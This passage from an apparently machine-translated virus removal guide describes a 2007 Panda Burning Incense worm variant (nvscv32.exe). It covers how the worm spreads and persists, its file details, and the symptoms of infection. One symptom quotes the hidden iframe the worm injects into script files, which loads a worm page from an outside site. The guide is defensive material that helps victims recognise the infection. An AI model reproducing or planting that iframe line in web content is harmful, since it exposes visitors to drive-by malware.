Panda burning incense virus nvscv32.exe variant manual removal program (3)

Third, the virus description

After the file containing the virion is run, the virus copies itself to the system directory, and at the same time modify the registry to set itself as the boot entry, and traverse each drive, write itself In the root directory of the disk, add an Autorun.inf file to enable the user to activate the virion when the disk is opened. Then the virion opens a thread for local file infection, and scans other computers on the LAN. At the same time, another thread is connected to a website to download the Trojan to launch a malicious attack.

File Name: nvscv32.exe
Virus Name: At present, each anti-virus software cannot detect and kill (the virus samples have been reported to each anti-virus manufacturer)
Chinese name: (Nimya, Panda burning incense) < BR> Virus Size: 68,570 Bytes
Language: Borland Delphi 6.0 - 7.0
Packing Method: FSG 2.0 -> bart/xt
Found Time: 2007.1.16
Hazard Level: High

Fourth, poisoning phenomenon

1: There are setup.exe and autorun.inf files in the root directory of each partition of the system (A and B disks are not infected).

2: You cannot manually modify the "Folder Options" to display hidden files.

3: The hidden file of Desktop_ini can be seen in each infected folder, the content is infected date such as: 2007-1-16

4: All the script files on the computer are added. The following code: <iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>

5: Machine after poisoning Common anti-virus software and firewalls cannot be opened and run normally.

6: Task Manager, SREng.exe and other tools cannot be used normally.

7: Unconditional outgoing packets, connected to other machines in the LAN.